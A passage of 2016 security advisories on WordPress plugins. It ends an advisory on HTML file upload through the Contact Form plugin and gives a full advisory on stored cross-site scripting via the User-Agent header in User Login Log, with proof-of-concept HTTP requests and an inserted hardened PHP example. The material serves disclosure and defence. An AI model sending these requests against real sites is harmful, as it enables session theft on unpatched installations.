http://<target>/wp-content/uploads/2016/07/cntctfrm_a407baae7f961b445422446f75575e89_test.html

Request example:

POST / HTTP/1.1
Host: <target>
Content-Length: 605
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPcjU2MvmAMp3t8r0
Connection: close

------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_attachment"; filename="test.html"
Content-Type: text/html

<html>
<body>
Hello world html
</body>
</html>
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_action"

send
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_language"

default
------WebKitFormBoundaryPcjU2MvmAMp3t8r0--

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_contact_form_wordpress_plugin.html
[2] https://wordpress.org/plugins/contact-form-plugin/
[3] https://downloads.wordpress.org/plugin/contact-form-plugin.4.0.2.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in User Login Log WordPress
Plugin
------------------------------------------------------------------------
Axel Koolhaas, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the User Login
Log WordPress Plugin. This issue can be exploited by Subscriber (or
higher) and allows an attacker to perform a wide variety of actions,
such as stealing users' session tokens, or performing arbitrary actions
on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0011

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on User Login Log [2] WordPress
Plugin version 2.2.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The User Login Log [2] WordPress Plugin keeps a record of WordPress user
logins together with information such as IP address, date, time, country,
city, and user name. A stored Cross-Site Scripting vulnerability was
found in the User Login Log WordPress Plugin. This issue can be
exploited by a Subscriber (or higher) and allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This vulnerability exists because the value of the User-Agent HTTP
request header is not output-encoded when the log is displayed. The
issue is in the method column_default(), implemented in the file
user-login-log.php.

function column_default($item, $column_name)
{
[...]
	switch($column_name){
[...]
	default:
		// $item holds the stored request data, so for the user agent
		// column the raw User-Agent header value is returned unescaped.
		return $item[$column_name];
	}
}
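The corresponding hardened column_default(), as an added example rather than the plugin's own fix: every value reaching a table cell is output-encoded with esc_html(), and the User-Agent is additionally normalised and length-capped when it is recorded. The helper name is an assumption.

```php
<?php
// Added example, not code from the User Login Log plugin; names are illustrative.

// Storage side: the User-Agent is attacker-controlled input, so strip tags and
// control characters and cap its length before it is written to the log table.
// This limits damage but is NOT the fix; the fix is encoding on output.
function ull_record_user_agent(): string
{
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? wp_unslash($_SERVER['HTTP_USER_AGENT']) : '';
    return mb_substr(sanitize_text_field($ua), 0, 512);
}

// Output side: the list-table callback from the advisory, now encoding every
// cell. Markup may only appear where the code builds it deliberately.
function column_default($item, $column_name)
{
    switch ($column_name) {
        default:
            // Previously: return $item[$column_name];  (the raw User-Agent
            // reached the admin page). esc_html() turns < > & " ' into
            // entities, so a stored <script> renders as text.
            return esc_html((string) ($item[$column_name] ?? ''));
    }
}
```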

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-login.php HTTP/1.1
Host: <target>
User-Agent: XSS<script>[...]</script>XSS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded

log=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html
[2] https://wordpress.org/plugins/user-login-log/
